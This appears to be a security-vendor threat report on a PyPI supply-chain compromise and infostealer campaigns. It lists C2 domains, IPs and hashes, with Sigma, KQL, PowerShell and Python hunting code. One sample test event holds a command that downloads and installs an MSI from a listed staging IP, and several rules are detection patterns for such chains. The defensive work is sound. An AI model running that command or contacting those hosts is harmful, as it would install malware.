
TeamPCP Supply Chain & Lumma Stealer Surge: Multi-Vector Credential Theft Campaign — OTX Analysis

Security Arsenal Team
May 3, 2026

Threat Summary

Recent OTX pulses indicate a convergence of sophisticated credential theft operations targeting both enterprise supply chains and individual consumers. The primary threats involve TeamPCP weaponizing the legitimate telnyx Python SDK on PyPI to deliver credential harvesters via steganography, and widespread distribution of Lumma Stealer through ClickFix phishing campaigns and GhostSocks proxy infrastructure. Additionally, the LofyGang is actively targeting Minecraft players with the LofyStealer, and a new Android banking trojan, KYCShadow, is focusing on financial theft in India. The collective objective is the mass exfiltration of session cookies, banking credentials, and OTPs for sale on dark web forums.

Threat Actor / Malware Profile

TeamPCP (Telnyx SDK Campaign)

  • Distribution: Supply chain compromise via PyPI. Malicious versions of the telnyx SDK (750k+ downloads).
  • Payload Behavior: Three-stage architecture: (1) the trojanized package triggers a platform-specific loader; (2) the loader downloads a second-stage payload hidden in a WAV file (steganography); (3) the second stage deploys the credential harvester.
  • Persistence: Established via the compromised Python package installation.
  • C2 Communication: Contacts hardcoded hostnames (e.g., scan.aquasecurtiy.org).

Lumma Stealer & GhostSocks

  • Distribution: ClickFix-style phishing (fake browser errors), MaaS (Malware-as-a-Service) via underground forums.
  • Payload Behavior: Lumma Stealer focuses on browser data; GhostSocks turns infected devices into residential proxy nodes.
  • Persistence: HijackLoader utilizes DLL sideloading with renamed legitimate binaries.
  • C2 Communication: Uses TLS encryption to blend in with normal traffic; domains like retreaw.click.

LofyStealer (LofyGang)

  • Distribution: Social engineering targeting Minecraft players.
  • Payload Behavior: Node.js-based loader (53.5MB) disguising itself in libraries, executing a 1.4MB in-memory C++ payload.
  • Capabilities: Steals cookies, passwords, tokens, credit cards from 8+ browsers.

KYCShadow

  • Distribution: WhatsApp messages masquerading as bank KYC verification apps.
  • Capabilities: OTP theft, SMS interception, WebView phishing, VPN traffic manipulation.

IOC Analysis

The provided IOCs are a mix of infrastructure and payload artifacts:

  • Domains/Hostnames: Several C2 domains such as aquasecurtiy.org (TeamPCP), serv.biz (KYCShadow), and retreaw.click (GhostSocks). These should be blocked immediately at the perimeter and DNS level.
  • IP Addresses: Includes 24.152.36.241 and 85.11.161.198. These are likely staging or C2 servers.
  • File Hashes: A large volume of SHA256, MD5, and SHA1 hashes are provided for the loaders, droppers, and payload DLLs/EXEs. SOC teams should use EDR hash correlation to hunt for these specific files on endpoints.
  • URLs: Specific HTTP endpoints hosting malicious MSI payloads (e.g., http://85.11.161.198:6600/...).
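The domain, IP and URL indicators above are only useful once they are matched against telemetry, and the match has to handle subdomains (scan.aquasecurtiy.org should hit the aquasecurtiy.org entry) and URLs that embed an IP. The following Python is an added example, not code from the original post: it reduces each DNS query or proxy URL to a hostname, checks it against the pulse's domains and IPs, and reports which log lines hit. The log lines and the `/constructed-path.msi` path are constructed for the example; only the domains and IPs come from the page.

```python
import ipaddress
import re
from urllib.parse import urlsplit

# Network IOCs quoted from the pulse summary above.
IOC_DOMAINS = {"aquasecurtiy.org", "serv.biz", "retreaw.click"}
IOC_IPS = {"24.152.36.241", "85.11.161.198"}

# Constructed sample log lines (not real telemetry): key=value DNS and proxy records.
SAMPLE_LOGS = [
    "2026-05-03T10:01:12Z dns client=10.0.0.15 query=scan.aquasecurtiy.org type=A",
    "2026-05-03T10:01:13Z dns client=10.0.0.15 query=www.aquasecurity.com type=A",
    "2026-05-03T10:02:40Z proxy client=10.0.0.22 url=http://85.11.161.198:6600/constructed-path.msi status=200",
    "2026-05-03T10:03:01Z proxy client=10.0.0.22 url=https://cdn.example.com/lib.js status=200",
    "2026-05-03T10:04:55Z dns client=10.0.0.31 query=cdn.retreaw.click. type=A",
    "2026-05-03T10:05:10Z dns client=10.0.0.31 query=retreaw.click.evil.example type=A",
]

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def host_from_url(url: str) -> str:
    """Hostname part of a URL ('' if the URL has none)."""
    return urlsplit(url).hostname or ""


def domain_hits(name: str) -> set:
    """IOC domains that equal `name` or are a parent domain of it.
    Suffix matching requires a dot boundary, so retreaw.click.evil.example
    does not match the retreaw.click entry."""
    name = name.lower().rstrip(".")
    return {d for d in IOC_DOMAINS if name == d or name.endswith("." + d)}


def ip_hit(value: str) -> bool:
    """True if `value` parses as an IP address on the IOC list."""
    try:
        return str(ipaddress.ip_address(value)) in IOC_IPS
    except ValueError:
        return False


def scan_line(line: str) -> set:
    """Return the set of IOCs referenced by one log line."""
    fields = dict(FIELD_RE.findall(line))
    candidates = []
    if "query" in fields:
        candidates.append(fields["query"])
    if "url" in fields:
        candidates.append(host_from_url(fields["url"]))
    hits = set()
    for candidate in candidates:
        hits |= domain_hits(candidate)
        if ip_hit(candidate):
            hits.add(candidate)
    return hits


def scan_logs(lines) -> list:
    """(line index, sorted IOC hits) for every line that references an IOC."""
    return [(i, sorted(hits)) for i, line in enumerate(lines) if (hits := scan_line(line))]


if __name__ == "__main__":
    for idx, hits in scan_logs(SAMPLE_LOGS):
        print(f"line {idx}: {', '.join(hits)}")
```

The same `domain_hits` logic can be dropped into a DNS response-policy or proxy-log pipeline; the dot-boundary rule is what keeps short entries such as serv.biz from matching unrelated names.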

Detection Engineering

Sigma Rules

---
title: Potential TeamPCP Telnyx SDK Malicious Execution
id: 8e2c3f1a-4b5d-4c2e-9e1a-8f8d1b2c3d4e
description: Detects msbuild.exe launched with the Telnyx SDK referenced on its command line, an execution pattern associated with the TeamPCP campaign.
status: experimental
date: 2026/05/03
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66000000
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        Image|endswith: '\msbuild.exe'
        CommandLine|contains:
            - 'telnyx'
    condition: selection
falsepositives:
    - Legitimate developer builds using the Telnyx SDK
level: high
tags:
    - attack.defense_evasion
    - attack.t1127.001
---
title: ClickFix Phishing PowerShell to MSI Execution
id: 1a2b3c4d-5e6f-7a8b-9c0d-1e2f3a4b5c6d
description: Detects msiexec.exe launched by PowerShell with a remote URL on its command line, a common pattern in ClickFix campaigns delivering HijackLoader and Lumma Stealer.
status: experimental
date: 2026/05/03
author: Security Arsenal
logsource:
    category: process_creation
    product: windows
detection:
    # A single process_creation event carries one Image; the parent/child
    # relationship is expressed through ParentImage, not two Image selections.
    selection:
        ParentImage|endswith: '\powershell.exe'
        Image|endswith: '\msiexec.exe'
        CommandLine|contains:
            - 'http://'
            - 'https://'
    condition: selection
falsepositives:
    - Legitimate software installation scripts
level: critical
tags:
    - attack.initial_access
    - attack.t1566.001
---
title: Suspicious Node.js Loader (LofyStealer)
id: 9f8e7d6c-5b4a-3c2d-1e0f-9a8b7c6d5e4f
description: Detects Node.js processes spawning unusual child processes or exhibiting high memory usage patterns consistent with LofyStealer/GrabBot loaders.
status: experimental
date: 2026/05/03
author: Security Arsenal
references:
    - https://otx.alienvault.com/pulse/66000002
logsource:
    category: process_creation
    product: windows
detection:
    selection:
        ParentImage|endswith: '\node.exe'
        Image|endswith:
            - '\cmd.exe'
            - '\powershell.exe'
            - '\rundll32.exe'
    filter_legit:
        CommandLine|contains:
            - 'npm'
            - 'yarn'
            - 'webpack'
    condition: selection and not filter_legit
falsepositives:
    - Legitimate Node.js development workflows
level: medium
tags:
    - attack.execution
    - attack.t1059.001
    - attack.t1059.003
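Before shipping rules like these, it is worth running their logic over a handful of representative events to confirm the match semantics. The Python below is an added example (not part of the original post) that implements the two modifiers the rules rely on (`endswith`, `contains`, with list values as OR) and the `selection and not filter` condition shape, then evaluates the ClickFix rule's intended relationship (msiexec.exe as a child of powershell.exe with a URL on its command line) and the LofyStealer rule's node.exe child-process logic against constructed process-creation events. The event records, paths and `constructed.dll` name are made up for the example.

```python
# Minimal matcher for the subset of Sigma used above.  Keys are "Field|modifier";
# values are a string or a list of strings (a list means any-of).
RULES = {
    "clickfix": {
        "selection": {
            "ParentImage|endswith": "\\powershell.exe",
            "Image|endswith": "\\msiexec.exe",
            "CommandLine|contains": ["http://", "https://"],
        },
        "condition": ("selection", None),          # selection, no filter
    },
    "node_loader": {
        "selection": {
            "ParentImage|endswith": "\\node.exe",
            "Image|endswith": ["\\cmd.exe", "\\powershell.exe", "\\rundll32.exe"],
        },
        "filter_legit": {"CommandLine|contains": ["npm", "yarn", "webpack"]},
        "condition": ("selection", "filter_legit"),  # selection and not filter_legit
    },
}

# Constructed process_creation events (not real telemetry).
SAMPLE_EVENTS = [
    {"ParentImage": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "msiexec.exe /i http://85.11.161.198:6600/constructed.msi /qn"},
    {"ParentImage": "C:\\Windows\\explorer.exe",
     "Image": "C:\\Windows\\System32\\msiexec.exe",
     "CommandLine": "msiexec.exe /i C:\\Users\\dev\\Downloads\\setup.msi"},
    {"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
     "Image": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "cmd.exe /c npm run build"},
    {"ParentImage": "C:\\Program Files\\nodejs\\node.exe",
     "Image": "C:\\Windows\\System32\\rundll32.exe",
     "CommandLine": "rundll32.exe C:\\Users\\dev\\AppData\\Local\\Temp\\constructed.dll,Start"},
]


def _field_matches(event: dict, key: str, expected) -> bool:
    """Apply one 'Field|modifier' test; Sigma string matching is case-insensitive."""
    field, _, modifier = key.partition("|")
    value = str(event.get(field, "")).lower()
    options = [str(o).lower() for o in (expected if isinstance(expected, list) else [expected])]
    if modifier == "endswith":
        return any(value.endswith(o) for o in options)
    if modifier == "contains":
        return any(o in value for o in options)
    return value in options  # no modifier: exact (case-insensitive) equality


def selection_matches(event: dict, selection: dict) -> bool:
    """All fields inside one selection are ANDed."""
    return all(_field_matches(event, k, v) for k, v in selection.items())


def rule_matches(event: dict, rule: dict) -> bool:
    selection_name, filter_name = rule["condition"]
    if not selection_matches(event, rule[selection_name]):
        return False
    if filter_name and selection_matches(event, rule[filter_name]):
        return False  # excluded by the 'and not filter' clause
    return True


def evaluate(events, rules) -> list:
    """(event index, rule name) for every rule that fires on an event."""
    return [(i, name) for i, event in enumerate(events)
            for name, rule in rules.items() if rule_matches(event, rule)]


if __name__ == "__main__":
    for idx, name in evaluate(SAMPLE_EVENTS, RULES):
        print(f"event {idx}: {name}")
```

Event 2 is the useful negative case: it satisfies the node_loader selection but is removed by the `npm` filter, which is exactly the behaviour the `filter_legit` block is meant to provide.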

KQL (Microsoft Sentinel)

// Query 1: hunt for TeamPCP and LofyStealer file hashes among processes
// started by Python, Node.js or PowerShell
DeviceProcessEvents
| where InitiatingProcessFileName in~ ("python.exe", "node.exe", "powershell.exe")
| where SHA256 in (
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
    "d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7",
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc"
)
| project Timestamp, DeviceName, AccountName, FolderPath, SHA256, InitiatingProcessFileName

// Query 2 (run as a separate query; a Kusto query accepts only one tabular
// expression statement): hunt for C2 domains and IPs associated with
// GhostSocks, TeamPCP, and KYCShadow. RemoteUrl may hold a bare FQDN or a
// full URL, so has_any is used instead of an exact-match 'in'.
DeviceNetworkEvents
| where RemoteUrl has_any (
    "scan.aquasecurtiy.org",
    "tdtqy-oyaaa-aaaae-af2dq-cai.raw.icp0.io",
    "aquasecurtiy.org",
    "retreaw.click",
    "w2.bruggebogeyed.site",
    "robinhuds.com",
    "serv.biz",
    "serv.xyz",
    "api.biz"
) or RemoteIP in ("24.152.36.241", "85.11.161.198")
| project Timestamp, DeviceName, RemoteUrl, RemoteIP, RemotePort, InitiatingProcessFileName

PowerShell Hunt Script

<#
.SYNOPSIS
    Hunt for artifacts associated with TeamPCP, LofyStealer, and Lumma Stealer based on OTX Pulse data.
.DESCRIPTION
    Hashes files under common Python and Node.js installation paths against the pulse's SHA256
    list, then checks established TCP connections against the pulse's C2 / staging IPs.
#>

$TargetHashes = @(
    "6cf223aea68b0e8031ff68251e30b6017a0513fe152e235c26f248ba1e15c92a",
    "8395c3268d5c5dbae1c7c6d4bb3c318c752ba4608cfcd90eb97ffb94a910eac2",
    "d2a0d5f564628773b6af7b9c11f6b86531a875bd2d186d7081ab62748a800ebb",
    "293006cec43c663ccff331795d662c3b73b4d7af5f8584e2899e286c672c9881",
    "45d4040e76a0d357dd6e236e185aba2eb82420d78640bfd1f3dede32b33931f7",
    "f31a8953531ffb5c14e2d8347e283e1f8f3c732a5a9a68f611c96f4730e8a7dc",
    "c529217014b732abbe646046c07ce8f0366a42051839d4cb3be5b400285fc728",
    "1d261b45e73b5b712becb12ed182ec89d3dd0d73143a2dd8ff5512da489a50eb"
)

# C2 / staging IPs from the pulse
$TargetIPs = @("24.152.36.241", "85.11.161.198")

function Find-HashHits {
    # Hash every file under $Paths (optionally limited by $Include) and emit the
    # FileInfo of each file whose SHA256 is on the $Hashes list.
    param(
        [Parameter(Mandatory)] [string[]] $Paths,
        [Parameter(Mandatory)] [string[]] $Hashes,
        [string[]] $Include = @("*")
    )
    foreach ($Path in $Paths) {
        if (-not (Test-Path $Path)) { continue }
        Write-Host "[*] Scanning directory: $Path" -ForegroundColor Yellow
        Get-ChildItem -Path $Path -Recurse -File -Include $Include -ErrorAction SilentlyContinue | ForEach-Object {
            $FileHash = Get-FileHash -Path $_.FullName -Algorithm SHA256 -ErrorAction SilentlyContinue
            if ($FileHash -and $Hashes -contains $FileHash.Hash) {
                Write-Host "[!] MALICIOUS FILE FOUND: $($_.FullName) (SHA256: $($FileHash.Hash))" -ForegroundColor Red
                $_
            }
        }
    }
}

Write-Host "[+] Starting scan for OTX Malware Artifacts..." -ForegroundColor Cyan

# Common Python package directories (TeamPCP trojanized telnyx SDK)
$PythonPaths = @("$env:LOCALAPPDATA\Programs\Python", "$env:APPDATA\Python")
$PythonHits = Find-HashHits -Paths $PythonPaths -Hashes $TargetHashes

# Node.js module directories (LofyStealer loader)
$NodePaths = @("$env:APPDATA\npm", "$env:USERPROFILE\node_modules")
$NodeHits = Find-HashHits -Paths $NodePaths -Hashes $TargetHashes -Include @("*.js", "*.node")

# Established connections to the pulse's C2 / staging IPs, with the owning process
$NetHits = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue |
    Where-Object { $TargetIPs -contains $_.RemoteAddress }
foreach ($Conn in $NetHits) {
    $Proc = Get-Process -Id $Conn.OwningProcess -ErrorAction SilentlyContinue
    Write-Host "[!] C2 CONNECTION: $($Conn.LocalAddress):$($Conn.LocalPort) -> $($Conn.RemoteAddress):$($Conn.RemotePort) (PID $($Conn.OwningProcess) $($Proc.ProcessName))" -ForegroundColor Red
}

$Total = @($PythonHits).Count + @($NodeHits).Count + @($NetHits).Count
Write-Host "[+] Scan complete. $Total indicator hit(s)." -ForegroundColor Green
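A hash sweep only finds files whose hashes are already known. For the Python side of this campaign, where the page describes persistence being established through the compromised package installation, a complementary check is to verify each installed distribution against its own RECORD manifest: every wheel install writes a `RECORD` listing each file with a sha256 digest (URL-safe base64, no padding), so a listed file that no longer matches, or a file sitting in the package tree that RECORD never mentioned, is worth triage. The Python below is an added example, not code from the original post or from any project it names; it builds a throwaway `demo_pkg` distribution in a temporary directory (everything about that package is constructed), verifies it clean, then tampers with it to show both a modified and an unlisted file being reported. Point `verify_distribution` at a real `*.dist-info` directory under `site-packages` to use it.

```python
import base64
import csv
import hashlib
import tempfile
from pathlib import Path


def _record_digest(data: bytes) -> str:
    """RECORD stores sha256 as URL-safe base64 with '=' padding stripped."""
    return base64.urlsafe_b64encode(hashlib.sha256(data).digest()).rstrip(b"=").decode()


def read_record(dist_info: Path) -> dict:
    """Map each RECORD path to (mode, digest), or None for entries with no hash
    (RECORD lists itself that way)."""
    entries = {}
    with (dist_info / "RECORD").open(newline="", encoding="utf-8") as fh:
        for row in csv.reader(fh):
            if len(row) < 2:
                continue
            mode, _, value = row[1].partition("=")
            entries[row[0]] = (mode, value) if value else None
    return entries


def verify_distribution(dist_info: Path) -> dict:
    """Compare the files of one installed distribution with its RECORD.
    Returns {'modified': [...], 'missing': [...], 'unlisted': [...]} with
    paths relative to the site-packages directory."""
    root = dist_info.parent
    record = read_record(dist_info)
    report = {"modified": [], "missing": [], "unlisted": []}
    listed = {(root / rel).resolve() for rel in record}
    for rel, digest in record.items():
        if digest is None:
            continue
        path = root / rel
        if not path.is_file():
            report["missing"].append(rel)
            continue
        mode, value = digest
        if mode != "sha256" or _record_digest(path.read_bytes()) != value:
            report["modified"].append(rel)
    # Walk the package directories RECORD refers to and flag files it never listed.
    top_levels = {Path(rel).parts[0] for rel in record
                  if not rel.startswith(dist_info.name) and not rel.startswith("..")}
    for top in sorted(top_levels):
        base = root / top
        if not base.is_dir():
            continue
        for f in sorted(base.rglob("*")):
            if f.is_file() and "__pycache__" not in f.parts and f.resolve() not in listed:
                report["unlisted"].append(f.relative_to(root).as_posix())
    return report


def build_demo_site(site: Path) -> Path:
    """Construct a throwaway site-packages with one package and a valid RECORD."""
    pkg = site / "demo_pkg"
    pkg.mkdir()
    dist_info = site / "demo_pkg-1.0.dist-info"
    dist_info.mkdir()
    init_src = b"VERSION = '1.0'\n"
    meta = b"Metadata-Version: 2.1\nName: demo_pkg\nVersion: 1.0\n"
    (pkg / "__init__.py").write_bytes(init_src)
    (dist_info / "METADATA").write_bytes(meta)
    rows = [
        ("demo_pkg/__init__.py", "sha256=" + _record_digest(init_src), str(len(init_src))),
        ("demo_pkg-1.0.dist-info/METADATA", "sha256=" + _record_digest(meta), str(len(meta))),
        ("demo_pkg-1.0.dist-info/RECORD", "", ""),
    ]
    with (dist_info / "RECORD").open("w", newline="", encoding="utf-8") as fh:
        csv.writer(fh).writerows(rows)
    return dist_info


def demo() -> tuple:
    """Verify the constructed package clean, then after simulated tampering."""
    with tempfile.TemporaryDirectory() as tmp:
        site = Path(tmp)
        dist_info = build_demo_site(site)
        clean = verify_distribution(dist_info)
        # Simulated post-install tampering: alter a listed file, add an unlisted one.
        (site / "demo_pkg" / "__init__.py").write_bytes(b"VERSION = '1.0'\nimport demo_pkg._extra\n")
        (site / "demo_pkg" / "_extra.py").write_bytes(b"# constructed unlisted file\n")
        tampered = verify_distribution(dist_info)
        return clean, tampered


if __name__ == "__main__":
    before, after = demo()
    print("clean install:", before)
    print("after tampering:", after)
```

This catches modification after installation; a malicious release published with a self-consistent RECORD passes it, which is why the check belongs alongside the hash hunt and the pin-to-known-hashes controls listed under Response Priorities, not in place of them.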

Response Priorities

  • Immediate: Block all listed domains and IPs at the firewall and proxy servers. Initiate a hunt for the SHA256 file hashes provided across all endpoints.
  • 24h: Conduct identity verification and credential resets for any accounts where the associated device flagged a positive hit for these infostealers, particularly targeting developers (TeamPCP) and finance teams (KYCShadow).
  • 1 Week: Review supply chain security policies regarding PyPI usage; implement code signing requirements and pre-deployment scanning for internal Python packages. Restrict PowerShell execution policies and enforce application allow-listing to prevent ClickFix infection chains.
